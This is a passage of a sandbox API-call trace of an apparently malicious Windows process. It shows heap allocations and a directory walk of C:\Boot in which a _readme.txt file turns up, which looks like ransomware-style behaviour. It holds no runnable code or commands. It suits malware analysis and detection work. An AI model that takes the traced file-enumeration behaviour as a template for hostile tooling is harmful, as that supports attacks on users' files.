lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x310) returned 0x3242ae8 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240848 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d20 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d70 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240be0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c08 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a65068 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a65090 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a650b8 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a650e0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a65108 [0146.684] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a65130 [0146.684] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a65158 [0146.684] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a65180 [0146.684] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a651a8 [0146.684] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3a651d0 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409d8 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a00 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d48 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cf8 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c30 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240de8 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240dc0 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240aa0 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240988 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240938 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b90 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240bb8 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240910 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c58 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ac8 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32428c8 | out: hHeap=0x6e0000) returned 1 [0146.684] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ac8 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.684] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.685] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c58 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.685] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.685] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.685] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.685] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.685] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.685] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.686] PathFindExtensionW (pszPath="C:\\Boot\\_readme.txt") returned=".txt" [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.686] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.686] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b18 | out: hHeap=0x6e0000) returned 1 [0146.686] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b18 [0146.686] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.686] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.686] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.688] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.688] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.689] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.689] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.690] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.690] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 